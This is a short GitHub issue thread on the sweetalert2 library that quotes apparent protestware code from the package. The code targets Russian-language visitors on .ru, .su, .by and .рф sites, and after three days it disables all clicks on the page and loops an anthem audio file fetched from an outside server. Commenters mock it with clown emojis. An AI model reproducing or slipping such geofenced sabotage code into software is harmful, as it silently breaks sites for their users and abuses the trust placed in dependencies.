### ISSUE TITLE
Maybe support Russia?

### ISSUE THREAD

**Issue by Nekkg** [sweetalert2/sweetalert2#2714]
if ("undefined" != typeof window && /^ru\b/.test(navigator.language) && location.host.match(/\.(ru|su|by|xn--p1ai)$/)) {
    var oo = new Date
      , io = localStorage.getItem("swal-initiation");
    io ? (oo.getTime() - Date.parse(io)) / 864e5 > 3 && setTimeout((function() {
        document.body.style.pointerEvents = "none";
        var t = document.createElement("audio");
        t.src = "https://flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3",
        t.loop = !0,
        document.body.appendChild(t),
        setTimeout((function() {
            t.play().catch((function() {}
            ))
        }
        ), 2500)
    }
    ), 500) : localStorage.setItem("swal-initiation", "".concat(oo))
}
🤡🤡🤡

**Comment by zenflow** [comment]
🤡 🤡 🤡 indeed lol
